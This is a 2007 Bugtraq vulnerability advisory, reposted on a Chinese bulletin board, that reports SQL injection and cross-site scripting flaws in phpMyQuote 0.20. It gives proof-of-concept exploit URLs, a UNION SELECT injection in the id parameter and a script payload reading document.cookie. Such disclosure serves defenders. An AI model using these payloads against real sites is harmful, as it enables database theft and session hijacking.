phpMyQuote 0.20 Version Multiple Sql And Xss Vulnerabilities

看板Bugtraq作者時間18年前 (2007/09/10 23:13), 編輯推噓0(000)
留言0則, 0人參與, 最新討論串1/1
/////////////// Yollubunlar.org /////////////// title: phpMyQuote 0.20 Version Multiple Sql And Xss Vulnerabilities Author : Yollubunlar.Org Orginal Article: http://yollubunlar.org/phpmyquote-020-version-multiple-sql-and-xss-vulnerabilities-3501.html MainPage: http://yollubunlar.org/category/web-security mail : yollubunlar@yollubunlar.org Exploit Sql : http://site.com/script_path/index.php?action=edit&id=[Sql injction] Example : /index.php?action=edit&id=-1%20union%20select%200,1,2,3,4,5/* Exploit Xss :http://site.com/script_path/index.php?action=edit&id=%3Cscript%3Ealert(document.cookie)%3C/script%3E /////////////// Yollubunlar.org ///////////////
文章代碼(AID): #16vLyD00 (Bugtraq)